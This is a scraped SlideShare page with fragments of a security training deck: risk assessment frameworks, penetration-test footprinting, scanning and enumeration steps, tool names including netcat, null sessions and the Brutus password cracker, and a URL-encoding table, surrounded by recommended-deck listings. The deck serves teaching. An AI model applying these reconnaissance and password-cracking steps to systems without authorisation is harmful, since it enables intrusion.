• Designed to assess the risk of automated
information systems that support infra
• Highly detailed and rigid process
http://csrc.nist.gov/publications/PubsSPs.html#800-30
http://csrc.nist.gov/publications/nistpubs/800-115/SP800-115.pdf
OCTAVE
• Originates from Carnegie Mellon University’s
S/W engg institute in collaboration with CERT
• Focusses on Org risk not technical
• OCTAVE for large org and OCTAVE-S for small
org.
http://www.cert.org/octave/
MS THREAT MODELING TOOL
• Based on CIA methodology
• Comprehensive attack library
• Contain helpful advanced features
http://www.microsoft.com/en-in/download/confirmation.aspx?id=42518
http://msdn.microsoft.com/en-us/library/ff649779.aspx
5. PENETRATION TESTING

Recommended for you

Ch14 security
Ch14   securityCh14   security
Ch14 security

This document provides an overview of operating system security. It discusses various security threats like program threats (e.g. viruses, Trojan horses), system and network threats (e.g. port scanning, denial of service attacks). It also covers cryptography as a security tool for encryption and authentication. Security measures need to be implemented at multiple levels - physical, human, operating system and network levels. Cryptography establishes secure communication over insecure mediums using encryption algorithms that encrypt messages using keys. Symmetric encryption uses the same key for encryption and decryption.

sistem operasi operating system
Complete notes security
Complete notes securityComplete notes security
Complete notes security

Unauthorized access to computer systems and networks can occur through various means such as hacking tools, social engineering, or exploiting system vulnerabilities. Network scanning tools can be used for both legitimate and illegitimate purposes to identify active systems and open ports. Various attacks exist such as man-in-the-middle, ARP poisoning, and wireless network hacking. Protecting against unauthorized access requires monitoring for anomalies, using tools like firewalls, regularly backing up data, and educating users.

Dcc3 1(cctk)support for newly added bios tokens
Dcc3 1(cctk)support for newly added bios tokensDcc3 1(cctk)support for newly added bios tokens
Dcc3 1(cctk)support for newly added bios tokens

The document discusses new tokens added to Dell Command Configure (DCC) 3.1 to control various components in stealth mode. It provides details on getting and setting the value of each token using DCC CLI commands and lists the supported line of business and platforms. Some of the new tokens discussed include Bluetoothstealthmode, fanstealthmode, gpsstealthmode, lcdstealthmode, and others to control components like Bluetooth, fans, GPS, LCD screen in stealth mode.

cctk slidesharedccbizclient cctk
THREE PRE TEST PHASES
• Footprinting:
– Whois(internic.net), Smartwhois, nslookup
– Check company webpage, contact, location, numbers,
www.archive.org, whatismyip.com
– Employee blogs, Job boards
• Scanning
– Identifying active systems
– Discover open ports and access points
– Fingerprinting the OS
– Uncovering services on ports
Tools-> nmap, ping, traceroute, netcat
THREE PRE TEST PHASES CONTD….
• Enumerating
– Identify user accounts
– discover NetBIOS name with Nbtscan
– SNMPutil for SNMP
– Windows DNS query
– Establishing Null session
Tools->
Vulnerability Scanner: Retina, SAINT
Password Crackers: Brutus
IMPORTANT URLS
• Privilege Escalation: http://blog.spiderlabs.com/2012/12/my-5-top-ways-to-
escalate-privileges.html
• Sniffer Tools : http://sectools.org/tag/sniffers/
DEFENDING REPUTATION ON INTERNET
• http://www.defendmyname.com
• http://www.reputationdefender.com
• http://www.visibletechnologies.com

Recommended for you

Dcm9 1(omci)support for newly added bios tokens
Dcm9 1(omci)support for newly added bios tokensDcm9 1(omci)support for newly added bios tokens
Dcm9 1(omci)support for newly added bios tokens

Dell Command Monitor 9.1 supports configuration of several new BIOS tokens related to system behavior and components. These include settings for extending POST time, controlling wireless activity LEDs, enabling Intel Ready Mode Technology, configuring keyboard backlight colors, setting primary video device slots, enabling/disabling docking station ports, and adjusting various settings for stealth/quiet mode. The document provides details on each new token, including possible values and WMIC commands to check/set the token values.

dell arti slideshareomci slideshareomci wmic
Powershell dcpp
Powershell dcppPowershell dcpp
Powershell dcpp

This document provides an introduction to Powershell and the Dell Command | Powershell Provider (DCPP). It discusses the history and versions of Powershell, how to get help and use the Integrated Scripting Environment. It also covers the basics of Powershell cmdlet structure and aliases. The document then introduces DCPP, which can be used to configure BIOS settings on Dell devices, and provides instructions for installing DCPP either from a zip file or using the Powershell Gallery.

dellpowershelldcpp
DCM 9.0(omci)support for newly added bios tokens
DCM 9.0(omci)support for newly added bios tokensDCM 9.0(omci)support for newly added bios tokens
DCM 9.0(omci)support for newly added bios tokens

Dell Command Monitor 9.0 adds support for new BIOS tokens that control various hardware features such as cameras, USB ports, wireless radios, and fan speeds on Dell laptops and desktops. The document provides details on each new token, including the command lines to check the current setting and enable or disable the feature.

dell precisiondellomci bios tokens
REFERENCES
• Google
• Old training Materials
• Wikipedia
• Security books
BACKUP
a %61 backspace %08 : %3A
b %62 tab %09 ; %3B
c %63 linefeed %0A < %3C
d %64 creturn %0D = %3D
e %65 space %20 > %3E
f %66 ! %21 ? %3F
g %67 " %22 @ %40
h %68 # %23 A %41
i %69 $ %24 B %42
j %6A % %25 C %43
k %6B & %26 D %44
l %6C ' %27 E %45
m %6D ( %28 F %46
n %6E ) %29 G %47
o %6F * %2A H %48
p %70 + %2B I %49
q %71 , %2C J %4A
r %72 - %2D K %4B
s %73 . %2E L %4C
t %74 / %2F M %4D
u %75 0 %30 N %4E
v %76 1 %31 O %4F
w %77 2 %32 P %50
x %78 3 %33 Q %51
y %79 4 %34 R %52
z %7A 5 %35 S %53
{ %7B 6 %36 T %54
| %7C 7 %37 U %55
} %7D 8 %38 V %56
~ %7E 9 %39 W %57
X %58
Y %59
Z %5A
[ %5B
 %5C
] %5D
^ %5E
_ %5F
` %60

More Related Content

What's hot

Basic Security Computere
Basic Security ComputereBasic Security Computere
Basic Security Computere
rashmi1234
 
Computer security overview
Computer security overviewComputer security overview
Computer security overview
CAS
 
Computer Security risks Shelly
Computer Security risks ShellyComputer Security risks Shelly
Computer Security risks Shelly
Adeel Khurram
 
Security Basics
Security BasicsSecurity Basics
Security Basics
Rishi Prasath
 
Computer security and
Computer security andComputer security and
Computer security and
Rana Usman Sattar
 
Computer security
Computer securityComputer security
Computer security
Shashi Chandra
 
4.2.1 computer security risks
4.2.1 computer security risks4.2.1 computer security risks
4.2.1 computer security risks
hazirma
 
Computer security threats & prevention
Computer security threats & preventionComputer security threats & prevention
Computer security threats & prevention
PriSim
 
Computer Security
Computer SecurityComputer Security
Computer Security
Frederik Questier
 
Computer security risks
Computer security risksComputer security risks
Computer security risks
Aasim Mushtaq
 
Network Security
Network SecurityNetwork Security
Network Security
EILLEN IVY PORTUGUEZ
 
Viruses, worms, and trojan horses
Viruses, worms, and trojan horsesViruses, worms, and trojan horses
Viruses, worms, and trojan horses
EILLEN IVY PORTUGUEZ
 
Computer security
Computer securityComputer security
Computer security
Univ of Salamanca
 
Basic Security Chapter 1
Basic Security Chapter 1Basic Security Chapter 1
Basic Security Chapter 1
AfiqEfendy Zaen
 
Computer , Internet and physical security.
Computer , Internet and physical security.Computer , Internet and physical security.
Computer , Internet and physical security.
Ankur Kumar
 
BAIT1003 Chapter 11
BAIT1003 Chapter 11BAIT1003 Chapter 11
BAIT1003 Chapter 11
limsh
 
23 network security threats pkg
23 network security threats pkg23 network security threats pkg
23 network security threats pkg
Umang Gupta
 
Threats to a computer
Threats to a computer Threats to a computer
Threats to a computer
FCA - Future Chartered Accountants
 
Computer security
Computer securityComputer security
Computer security
EktaVaswani2
 
System security
System securitySystem security
System security
sommerville-videos
 

What's hot (20)

Basic Security Computere
Basic Security ComputereBasic Security Computere
Basic Security Computere
 
Computer security overview
Computer security overviewComputer security overview
Computer security overview
 
Computer Security risks Shelly
Computer Security risks ShellyComputer Security risks Shelly
Computer Security risks Shelly
 
Security Basics
Security BasicsSecurity Basics
Security Basics
 
Computer security and
Computer security andComputer security and
Computer security and
 
Computer security
Computer securityComputer security
Computer security
 
4.2.1 computer security risks
4.2.1 computer security risks4.2.1 computer security risks
4.2.1 computer security risks
 
Computer security threats & prevention
Computer security threats & preventionComputer security threats & prevention
Computer security threats & prevention
 
Computer Security
Computer SecurityComputer Security
Computer Security
 
Computer security risks
Computer security risksComputer security risks
Computer security risks
 
Network Security
Network SecurityNetwork Security
Network Security
 
Viruses, worms, and trojan horses
Viruses, worms, and trojan horsesViruses, worms, and trojan horses
Viruses, worms, and trojan horses
 
Computer security
Computer securityComputer security
Computer security
 
Basic Security Chapter 1
Basic Security Chapter 1Basic Security Chapter 1
Basic Security Chapter 1
 
Computer , Internet and physical security.
Computer , Internet and physical security.Computer , Internet and physical security.
Computer , Internet and physical security.
 
BAIT1003 Chapter 11
BAIT1003 Chapter 11BAIT1003 Chapter 11
BAIT1003 Chapter 11
 
23 network security threats pkg
23 network security threats pkg23 network security threats pkg
23 network security threats pkg
 
Threats to a computer
Threats to a computer Threats to a computer
Threats to a computer
 
Computer security
Computer securityComputer security
Computer security
 
System security
System securitySystem security
System security
 

Viewers also liked

Lecture5
Lecture5Lecture5
Lecture5
Majid Taghiloo
 
Networking Concepts Lesson 10 part 2 - Security Appendix - Eric Vanderburg
Networking Concepts Lesson 10 part 2 - Security Appendix - Eric VanderburgNetworking Concepts Lesson 10 part 2 - Security Appendix - Eric Vanderburg
Networking Concepts Lesson 10 part 2 - Security Appendix - Eric Vanderburg
Eric Vanderburg
 
360suite Business Objects Xi3 New Security Concepts
360suite Business Objects Xi3 New Security Concepts360suite Business Objects Xi3 New Security Concepts
360suite Business Objects Xi3 New Security Concepts
Sebastien Goiffon
 
PACE-IT: Basic Network Concepts (part 2)
PACE-IT: Basic Network Concepts (part 2)PACE-IT: Basic Network Concepts (part 2)
PACE-IT: Basic Network Concepts (part 2)
Pace IT at Edmonds Community College
 
PACE-IT, Security+ 4.2: Mobile Security Concepts and Technologies (part 2)
PACE-IT, Security+ 4.2: Mobile Security Concepts and Technologies (part 2)PACE-IT, Security+ 4.2: Mobile Security Concepts and Technologies (part 2)
PACE-IT, Security+ 4.2: Mobile Security Concepts and Technologies (part 2)
Pace IT at Edmonds Community College
 
PACE-IT, Security+1.2: Secure Network Administration Concepts
PACE-IT, Security+1.2: Secure Network Administration ConceptsPACE-IT, Security+1.2: Secure Network Administration Concepts
PACE-IT, Security+1.2: Secure Network Administration Concepts
Pace IT at Edmonds Community College
 
PACE-IT: Basic Network Concepts (part 1)
PACE-IT: Basic Network Concepts (part 1)PACE-IT: Basic Network Concepts (part 1)
PACE-IT: Basic Network Concepts (part 1)
Pace IT at Edmonds Community College
 
Information Security Management. Security solutions copy
Information Security Management. Security solutions copyInformation Security Management. Security solutions copy
Information Security Management. Security solutions copy
yuliana_mar
 
A review of network concepts base on CISCO by Ali Shahbazi
A review of network concepts base on CISCO by Ali ShahbaziA review of network concepts base on CISCO by Ali Shahbazi
A review of network concepts base on CISCO by Ali Shahbazi
Ali Shahbazi Khojasteh
 
Network and security concepts
Network and security conceptsNetwork and security concepts
Network and security concepts
sonuagain
 
Basic Network Concepts
Basic Network ConceptsBasic Network Concepts
Basic Network Concepts
Abhishek Singh
 
5G Wireless Technology - pavankumar_912
5G Wireless Technology - pavankumar_9125G Wireless Technology - pavankumar_912
5G Wireless Technology - pavankumar_912
Pavan Kumar Sindgi
 
Network Security
Network SecurityNetwork Security
Network Security
MAJU
 
Basic concepts of computer Networking
Basic concepts of computer NetworkingBasic concepts of computer Networking
Basic concepts of computer Networking
Hj Habib
 
Mobile security in Cyber Security
Mobile security in Cyber SecurityMobile security in Cyber Security
Mobile security in Cyber Security
Geo Marian
 
Introduction to computer network
Introduction to computer networkIntroduction to computer network
Introduction to computer network
Ashita Agrawal
 

Viewers also liked (16)

Lecture5
Lecture5Lecture5
Lecture5
 
Networking Concepts Lesson 10 part 2 - Security Appendix - Eric Vanderburg
Networking Concepts Lesson 10 part 2 - Security Appendix - Eric VanderburgNetworking Concepts Lesson 10 part 2 - Security Appendix - Eric Vanderburg
Networking Concepts Lesson 10 part 2 - Security Appendix - Eric Vanderburg
 
360suite Business Objects Xi3 New Security Concepts
360suite Business Objects Xi3 New Security Concepts360suite Business Objects Xi3 New Security Concepts
360suite Business Objects Xi3 New Security Concepts
 
PACE-IT: Basic Network Concepts (part 2)
PACE-IT: Basic Network Concepts (part 2)PACE-IT: Basic Network Concepts (part 2)
PACE-IT: Basic Network Concepts (part 2)
 
PACE-IT, Security+ 4.2: Mobile Security Concepts and Technologies (part 2)
PACE-IT, Security+ 4.2: Mobile Security Concepts and Technologies (part 2)PACE-IT, Security+ 4.2: Mobile Security Concepts and Technologies (part 2)
PACE-IT, Security+ 4.2: Mobile Security Concepts and Technologies (part 2)
 
PACE-IT, Security+1.2: Secure Network Administration Concepts
PACE-IT, Security+1.2: Secure Network Administration ConceptsPACE-IT, Security+1.2: Secure Network Administration Concepts
PACE-IT, Security+1.2: Secure Network Administration Concepts
 
PACE-IT: Basic Network Concepts (part 1)
PACE-IT: Basic Network Concepts (part 1)PACE-IT: Basic Network Concepts (part 1)
PACE-IT: Basic Network Concepts (part 1)
 
Information Security Management. Security solutions copy
Information Security Management. Security solutions copyInformation Security Management. Security solutions copy
Information Security Management. Security solutions copy
 
A review of network concepts base on CISCO by Ali Shahbazi
A review of network concepts base on CISCO by Ali ShahbaziA review of network concepts base on CISCO by Ali Shahbazi
A review of network concepts base on CISCO by Ali Shahbazi
 
Network and security concepts
Network and security conceptsNetwork and security concepts
Network and security concepts
 
Basic Network Concepts
Basic Network ConceptsBasic Network Concepts
Basic Network Concepts
 
5G Wireless Technology - pavankumar_912
5G Wireless Technology - pavankumar_9125G Wireless Technology - pavankumar_912
5G Wireless Technology - pavankumar_912
 
Network Security
Network SecurityNetwork Security
Network Security
 
Basic concepts of computer Networking
Basic concepts of computer NetworkingBasic concepts of computer Networking
Basic concepts of computer Networking
 
Mobile security in Cyber Security
Mobile security in Cyber SecurityMobile security in Cyber Security
Mobile security in Cyber Security
 
Introduction to computer network
Introduction to computer networkIntroduction to computer network
Introduction to computer network
 

Similar to Security concepts

Types of Attack in Information and Network Security
Types of Attack in Information and Network SecurityTypes of Attack in Information and Network Security
Types of Attack in Information and Network Security
padmeshagrekar
 
Web Security
Web SecurityWeb Security
Web Security
Gerald Villorente
 
Phases of penetration testing
Phases of penetration testingPhases of penetration testing
Phases of penetration testing
Abdul Rahman
 
DDOS ATTACKS
DDOS ATTACKSDDOS ATTACKS
DDOS ATTACKS
Shaurya Gogia
 
Security and Linux Security
Security and Linux SecuritySecurity and Linux Security
Security and Linux Security
Rizky Ariestiyansyah
 
Botnets Attacks.pptx
Botnets Attacks.pptxBotnets Attacks.pptx
Botnets Attacks.pptx
MuhammadRehan856177
 
Network sec 1
Network sec 1Network sec 1
Network sec 1
Jasleen Kaur
 
Computer Network Case Study - bajju.pptx
Computer Network Case Study - bajju.pptxComputer Network Case Study - bajju.pptx
Computer Network Case Study - bajju.pptx
ShivamBajaj36
 
640-554 IT Certification and Career Paths
640-554 IT Certification and Career Paths640-554 IT Certification and Career Paths
640-554 IT Certification and Career Paths
hibaehed
 
Tools and methods used in cybercrime
Tools and methods used in cybercrimeTools and methods used in cybercrime
Tools and methods used in cybercrime
patelripal99
 
Network And Application Layer Attacks
Network And Application Layer AttacksNetwork And Application Layer Attacks
Network And Application Layer Attacks
Arun Modi
 
3. APTs Presentation
3. APTs Presentation3. APTs Presentation
3. APTs Presentation
isc2-hellenic
 
Ids 009 network attacks
Ids 009 network attacksIds 009 network attacks
Ids 009 network attacks
jyoti_lakhani
 
Port of seattle security presentation david morris
Port of seattle security presentation   david morrisPort of seattle security presentation   david morris
Port of seattle security presentation david morris
Emily2014
 
Kunal - Introduction to BackTrack - ClubHack2008
Kunal - Introduction to BackTrack - ClubHack2008Kunal - Introduction to BackTrack - ClubHack2008
Kunal - Introduction to BackTrack - ClubHack2008
ClubHack
 
Kunal - Introduction to backtrack - ClubHack2008
Kunal - Introduction to backtrack - ClubHack2008Kunal - Introduction to backtrack - ClubHack2008
Kunal - Introduction to backtrack - ClubHack2008
ClubHack
 
Workshop on BackTrack live CD
Workshop on BackTrack live CDWorkshop on BackTrack live CD
Workshop on BackTrack live CD
amiable_indian
 
PLNOG 8: Merike Kaeo - Guide to Building Secure Infrastructures
PLNOG 8: Merike Kaeo -  Guide to Building Secure InfrastructuresPLNOG 8: Merike Kaeo -  Guide to Building Secure Infrastructures
PLNOG 8: Merike Kaeo - Guide to Building Secure Infrastructures
PROIDEA
 
Ch14 security
Ch14   securityCh14   security
Ch14 security
Welly Dian Astika
 
Complete notes security
Complete notes securityComplete notes security
Complete notes security
Kitkat Emoo
 

Similar to Security concepts (20)

Types of Attack in Information and Network Security
Types of Attack in Information and Network SecurityTypes of Attack in Information and Network Security
Types of Attack in Information and Network Security
 
Web Security
Web SecurityWeb Security
Web Security
 
Phases of penetration testing
Phases of penetration testingPhases of penetration testing
Phases of penetration testing
 
DDOS ATTACKS
DDOS ATTACKSDDOS ATTACKS
DDOS ATTACKS
 
Security and Linux Security
Security and Linux SecuritySecurity and Linux Security
Security and Linux Security
 
Botnets Attacks.pptx
Botnets Attacks.pptxBotnets Attacks.pptx
Botnets Attacks.pptx
 
Network sec 1
Network sec 1Network sec 1
Network sec 1
 
Computer Network Case Study - bajju.pptx
Computer Network Case Study - bajju.pptxComputer Network Case Study - bajju.pptx
Computer Network Case Study - bajju.pptx
 
640-554 IT Certification and Career Paths
640-554 IT Certification and Career Paths640-554 IT Certification and Career Paths
640-554 IT Certification and Career Paths
 
Tools and methods used in cybercrime
Tools and methods used in cybercrimeTools and methods used in cybercrime
Tools and methods used in cybercrime
 
Network And Application Layer Attacks
Network And Application Layer AttacksNetwork And Application Layer Attacks
Network And Application Layer Attacks
 
3. APTs Presentation
3. APTs Presentation3. APTs Presentation
3. APTs Presentation
 
Ids 009 network attacks
Ids 009 network attacksIds 009 network attacks
Ids 009 network attacks
 
Port of seattle security presentation david morris
Port of seattle security presentation   david morrisPort of seattle security presentation   david morris
Port of seattle security presentation david morris
 
Kunal - Introduction to BackTrack - ClubHack2008
Kunal - Introduction to BackTrack - ClubHack2008Kunal - Introduction to BackTrack - ClubHack2008
Kunal - Introduction to BackTrack - ClubHack2008
 
Kunal - Introduction to backtrack - ClubHack2008
Kunal - Introduction to backtrack - ClubHack2008Kunal - Introduction to backtrack - ClubHack2008
Kunal - Introduction to backtrack - ClubHack2008
 
Workshop on BackTrack live CD
Workshop on BackTrack live CDWorkshop on BackTrack live CD
Workshop on BackTrack live CD
 
PLNOG 8: Merike Kaeo - Guide to Building Secure Infrastructures
PLNOG 8: Merike Kaeo -  Guide to Building Secure InfrastructuresPLNOG 8: Merike Kaeo -  Guide to Building Secure Infrastructures
PLNOG 8: Merike Kaeo - Guide to Building Secure Infrastructures
 
Ch14 security
Ch14   securityCh14   security
Ch14 security
 
Complete notes security
Complete notes securityComplete notes security
Complete notes security
 

More from artisriva

Dcc3 1(cctk)support for newly added bios tokens
Dcc3 1(cctk)support for newly added bios tokensDcc3 1(cctk)support for newly added bios tokens
Dcc3 1(cctk)support for newly added bios tokens
artisriva
 
Dcm9 1(omci)support for newly added bios tokens
Dcm9 1(omci)support for newly added bios tokensDcm9 1(omci)support for newly added bios tokens
Dcm9 1(omci)support for newly added bios tokens
artisriva
 
Powershell dcpp
Powershell dcppPowershell dcpp
Powershell dcpp
artisriva
 
DCM 9.0(omci)support for newly added bios tokens
DCM 9.0(omci)support for newly added bios tokensDCM 9.0(omci)support for newly added bios tokens
DCM 9.0(omci)support for newly added bios tokens
artisriva
 
DCC 3.0(cctk)support for newly added bios tokens
DCC 3.0(cctk)support for newly added bios tokensDCC 3.0(cctk)support for newly added bios tokens
DCC 3.0(cctk)support for newly added bios tokens
artisriva
 
OMCI8.2.1 support for newly added bios tokens
OMCI8.2.1 support for newly added bios tokensOMCI8.2.1 support for newly added bios tokens
OMCI8.2.1 support for newly added bios tokens
artisriva
 
CCTK2.2.1 support for newly added bios tokens
CCTK2.2.1 support for newly added bios tokensCCTK2.2.1 support for newly added bios tokens
CCTK2.2.1 support for newly added bios tokens
artisriva
 
Dell biz client driver cab os deployment using sccm dcip
Dell biz client driver cab os deployment using sccm dcipDell biz client driver cab os deployment using sccm dcip
Dell biz client driver cab os deployment using sccm dcip
artisriva
 
Omci8.2 support for newly added bios tokens
Omci8.2 support for newly added bios tokensOmci8.2 support for newly added bios tokens
Omci8.2 support for newly added bios tokens
artisriva
 
Linux training
Linux trainingLinux training
Linux training
artisriva
 
Cctk support for setting hdd password
Cctk support for setting hdd passwordCctk support for setting hdd password
Cctk support for setting hdd password
artisriva
 
Dell Cctk support for newly added bios tokens
Dell Cctk support for newly added bios tokensDell Cctk support for newly added bios tokens
Dell Cctk support for newly added bios tokens
artisriva
 

More from artisriva (12)

Dcc3 1(cctk)support for newly added bios tokens
Dcc3 1(cctk)support for newly added bios tokensDcc3 1(cctk)support for newly added bios tokens
Dcc3 1(cctk)support for newly added bios tokens
 
Dcm9 1(omci)support for newly added bios tokens
Dcm9 1(omci)support for newly added bios tokensDcm9 1(omci)support for newly added bios tokens
Dcm9 1(omci)support for newly added bios tokens
 
Powershell dcpp
Powershell dcppPowershell dcpp
Powershell dcpp
 
DCM 9.0(omci)support for newly added bios tokens
DCM 9.0(omci)support for newly added bios tokensDCM 9.0(omci)support for newly added bios tokens
DCM 9.0(omci)support for newly added bios tokens
 
DCC 3.0(cctk)support for newly added bios tokens
DCC 3.0(cctk)support for newly added bios tokensDCC 3.0(cctk)support for newly added bios tokens
DCC 3.0(cctk)support for newly added bios tokens
 
OMCI8.2.1 support for newly added bios tokens
OMCI8.2.1 support for newly added bios tokensOMCI8.2.1 support for newly added bios tokens
OMCI8.2.1 support for newly added bios tokens
 
CCTK2.2.1 support for newly added bios tokens
CCTK2.2.1 support for newly added bios tokensCCTK2.2.1 support for newly added bios tokens
CCTK2.2.1 support for newly added bios tokens
 
Dell biz client driver cab os deployment using sccm dcip
Dell biz client driver cab os deployment using sccm dcipDell biz client driver cab os deployment using sccm dcip
Dell biz client driver cab os deployment using sccm dcip
 
Omci8.2 support for newly added bios tokens
Omci8.2 support for newly added bios tokensOmci8.2 support for newly added bios tokens
Omci8.2 support for newly added bios tokens
 
Linux training
Linux trainingLinux training
Linux training
 
Cctk support for setting hdd password
Cctk support for setting hdd passwordCctk support for setting hdd password
Cctk support for setting hdd password
 
Dell Cctk support for newly added bios tokens
Dell Cctk support for newly added bios tokensDell Cctk support for newly added bios tokens
Dell Cctk support for newly added bios tokens
 

Recently uploaded

20240705 QFM024 Irresponsible AI Reading List June 2024
20240705 QFM024 Irresponsible AI Reading List June 202420240705 QFM024 Irresponsible AI Reading List June 2024
20240705 QFM024 Irresponsible AI Reading List June 2024
Matthew Sinclair
 
Research Directions for Cross Reality Interfaces
Research Directions for Cross Reality InterfacesResearch Directions for Cross Reality Interfaces
Research Directions for Cross Reality Interfaces
Mark Billinghurst
 
20240704 QFM023 Engineering Leadership Reading List June 2024
20240704 QFM023 Engineering Leadership Reading List June 202420240704 QFM023 Engineering Leadership Reading List June 2024
20240704 QFM023 Engineering Leadership Reading List June 2024
Matthew Sinclair
 
Recent Advancements in the NIST-JARVIS Infrastructure
Recent Advancements in the NIST-JARVIS InfrastructureRecent Advancements in the NIST-JARVIS Infrastructure
Recent Advancements in the NIST-JARVIS Infrastructure
KAMAL CHOUDHARY
 
Measuring the Impact of Network Latency at Twitter
Measuring the Impact of Network Latency at TwitterMeasuring the Impact of Network Latency at Twitter
Measuring the Impact of Network Latency at Twitter
ScyllaDB
 
Mitigating the Impact of State Management in Cloud Stream Processing Systems
Mitigating the Impact of State Management in Cloud Stream Processing SystemsMitigating the Impact of State Management in Cloud Stream Processing Systems
Mitigating the Impact of State Management in Cloud Stream Processing Systems
ScyllaDB
 
INDIAN AIR FORCE FIGHTER PLANES LIST.pdf
INDIAN AIR FORCE FIGHTER PLANES LIST.pdfINDIAN AIR FORCE FIGHTER PLANES LIST.pdf
INDIAN AIR FORCE FIGHTER PLANES LIST.pdf
jackson110191
 
Pigging Solutions Sustainability brochure.pdf
Pigging Solutions Sustainability brochure.pdfPigging Solutions Sustainability brochure.pdf
Pigging Solutions Sustainability brochure.pdf
Pigging Solutions
 
Understanding Insider Security Threats: Types, Examples, Effects, and Mitigat...
Understanding Insider Security Threats: Types, Examples, Effects, and Mitigat...Understanding Insider Security Threats: Types, Examples, Effects, and Mitigat...
Understanding Insider Security Threats: Types, Examples, Effects, and Mitigat...
Bert Blevins
 
RPA In Healthcare Benefits, Use Case, Trend And Challenges 2024.pptx
RPA In Healthcare Benefits, Use Case, Trend And Challenges 2024.pptxRPA In Healthcare Benefits, Use Case, Trend And Challenges 2024.pptx
RPA In Healthcare Benefits, Use Case, Trend And Challenges 2024.pptx
SynapseIndia
 
What’s New in Teams Calling, Meetings and Devices May 2024
What’s New in Teams Calling, Meetings and Devices May 2024What’s New in Teams Calling, Meetings and Devices May 2024
What’s New in Teams Calling, Meetings and Devices May 2024
Stephanie Beckett
 
WPRiders Company Presentation Slide Deck
WPRiders Company Presentation Slide DeckWPRiders Company Presentation Slide Deck
WPRiders Company Presentation Slide Deck
Lidia A.
 
WhatsApp Image 2024-03-27 at 08.19.52_bfd93109.pdf
WhatsApp Image 2024-03-27 at 08.19.52_bfd93109.pdfWhatsApp Image 2024-03-27 at 08.19.52_bfd93109.pdf
WhatsApp Image 2024-03-27 at 08.19.52_bfd93109.pdf
ArgaBisma
 
Calgary MuleSoft Meetup APM and IDP .pptx
Calgary MuleSoft Meetup APM and IDP .pptxCalgary MuleSoft Meetup APM and IDP .pptx
Calgary MuleSoft Meetup APM and IDP .pptx
ishalveerrandhawa1
 
20240702 Présentation Plateforme GenAI.pdf
20240702 Présentation Plateforme GenAI.pdf20240702 Présentation Plateforme GenAI.pdf
20240702 Présentation Plateforme GenAI.pdf
Sally Laouacheria
 
Quantum Communications Q&A with Gemini LLM
Quantum Communications Q&A with Gemini LLMQuantum Communications Q&A with Gemini LLM
Quantum Communications Q&A with Gemini LLM
Vijayananda Mohire
 
Scaling Connections in PostgreSQL Postgres Bangalore(PGBLR) Meetup-2 - Mydbops
Scaling Connections in PostgreSQL Postgres Bangalore(PGBLR) Meetup-2 - MydbopsScaling Connections in PostgreSQL Postgres Bangalore(PGBLR) Meetup-2 - Mydbops
Scaling Connections in PostgreSQL Postgres Bangalore(PGBLR) Meetup-2 - Mydbops
Mydbops
 
The Increasing Use of the National Research Platform by the CSU Campuses
The Increasing Use of the National Research Platform by the CSU CampusesThe Increasing Use of the National Research Platform by the CSU Campuses
The Increasing Use of the National Research Platform by the CSU Campuses
Larry Smarr
 
Active Inference is a veryyyyyyyyyyyyyyyyyyyyyyyy
Active Inference is a veryyyyyyyyyyyyyyyyyyyyyyyyActive Inference is a veryyyyyyyyyyyyyyyyyyyyyyyy
Active Inference is a veryyyyyyyyyyyyyyyyyyyyyyyy
RaminGhanbari2
 
BT & Neo4j: Knowledge Graphs for Critical Enterprise Systems.pptx.pdf
BT & Neo4j: Knowledge Graphs for Critical Enterprise Systems.pptx.pdfBT & Neo4j: Knowledge Graphs for Critical Enterprise Systems.pptx.pdf
BT & Neo4j: Knowledge Graphs for Critical Enterprise Systems.pptx.pdf
Neo4j
 

Recently uploaded (20)

20240705 QFM024 Irresponsible AI Reading List June 2024
20240705 QFM024 Irresponsible AI Reading List June 202420240705 QFM024 Irresponsible AI Reading List June 2024
20240705 QFM024 Irresponsible AI Reading List June 2024
 
Research Directions for Cross Reality Interfaces
Research Directions for Cross Reality InterfacesResearch Directions for Cross Reality Interfaces
Research Directions for Cross Reality Interfaces
 
20240704 QFM023 Engineering Leadership Reading List June 2024
20240704 QFM023 Engineering Leadership Reading List June 202420240704 QFM023 Engineering Leadership Reading List June 2024
20240704 QFM023 Engineering Leadership Reading List June 2024
 
Recent Advancements in the NIST-JARVIS Infrastructure
Recent Advancements in the NIST-JARVIS InfrastructureRecent Advancements in the NIST-JARVIS Infrastructure
Recent Advancements in the NIST-JARVIS Infrastructure
 
Measuring the Impact of Network Latency at Twitter
Measuring the Impact of Network Latency at TwitterMeasuring the Impact of Network Latency at Twitter
Measuring the Impact of Network Latency at Twitter
 
Mitigating the Impact of State Management in Cloud Stream Processing Systems
Mitigating the Impact of State Management in Cloud Stream Processing SystemsMitigating the Impact of State Management in Cloud Stream Processing Systems
Mitigating the Impact of State Management in Cloud Stream Processing Systems
 
INDIAN AIR FORCE FIGHTER PLANES LIST.pdf
INDIAN AIR FORCE FIGHTER PLANES LIST.pdfINDIAN AIR FORCE FIGHTER PLANES LIST.pdf
INDIAN AIR FORCE FIGHTER PLANES LIST.pdf
 
Pigging Solutions Sustainability brochure.pdf
Pigging Solutions Sustainability brochure.pdfPigging Solutions Sustainability brochure.pdf
Pigging Solutions Sustainability brochure.pdf
 
Understanding Insider Security Threats: Types, Examples, Effects, and Mitigat...
Understanding Insider Security Threats: Types, Examples, Effects, and Mitigat...Understanding Insider Security Threats: Types, Examples, Effects, and Mitigat...
Understanding Insider Security Threats: Types, Examples, Effects, and Mitigat...
 
RPA In Healthcare Benefits, Use Case, Trend And Challenges 2024.pptx
RPA In Healthcare Benefits, Use Case, Trend And Challenges 2024.pptxRPA In Healthcare Benefits, Use Case, Trend And Challenges 2024.pptx
RPA In Healthcare Benefits, Use Case, Trend And Challenges 2024.pptx
 
What’s New in Teams Calling, Meetings and Devices May 2024
What’s New in Teams Calling, Meetings and Devices May 2024What’s New in Teams Calling, Meetings and Devices May 2024
What’s New in Teams Calling, Meetings and Devices May 2024
 
WPRiders Company Presentation Slide Deck
WPRiders Company Presentation Slide DeckWPRiders Company Presentation Slide Deck
WPRiders Company Presentation Slide Deck
 
WhatsApp Image 2024-03-27 at 08.19.52_bfd93109.pdf
WhatsApp Image 2024-03-27 at 08.19.52_bfd93109.pdfWhatsApp Image 2024-03-27 at 08.19.52_bfd93109.pdf
WhatsApp Image 2024-03-27 at 08.19.52_bfd93109.pdf
 
Calgary MuleSoft Meetup APM and IDP .pptx
Calgary MuleSoft Meetup APM and IDP .pptxCalgary MuleSoft Meetup APM and IDP .pptx
Calgary MuleSoft Meetup APM and IDP .pptx
 
20240702 Présentation Plateforme GenAI.pdf
